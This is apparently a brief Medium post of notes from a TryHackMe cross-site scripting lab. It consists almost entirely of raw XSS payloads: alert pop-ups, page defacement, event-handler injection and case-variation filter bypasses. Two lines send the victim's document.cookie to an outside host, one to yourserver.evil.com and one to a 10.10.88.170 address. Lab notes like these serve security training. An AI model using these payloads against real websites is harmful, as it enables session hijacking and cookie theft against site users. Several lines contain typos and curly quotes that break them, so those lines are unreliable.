TryHackMe: Cross-Site Scripting

<a href=”www.google.com”> Click on this link </a>
<script>alert(document.cookie)</script>
<script> document.querySelector('#thm-title').textContent = 'I am a hacker' </script>
document.write(‘<img src=”https://yourserver.evil.com/collect.gif?cookie=' + document.cookie + ‘“ />’)
<script>document.location='http://10.10.88.170/log'+document.cookie</script>
<script>alert("Hello")</script>
<script>alert(window.location.hostname)</script>
test" onmouseover="alert(document.cookie)" ORtest" onerror="alert(document.cookie)"
test" onmousehover="document.body.style.backgroundColor = 'red'"
<img src="x" onerror="alert('Hello')">
<img src="x" onerror="prompt('Hello')">
<img src="x" onerror="alert('HHelloello')">
<img src="x" ONERROR="alert('HHelloello')">

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store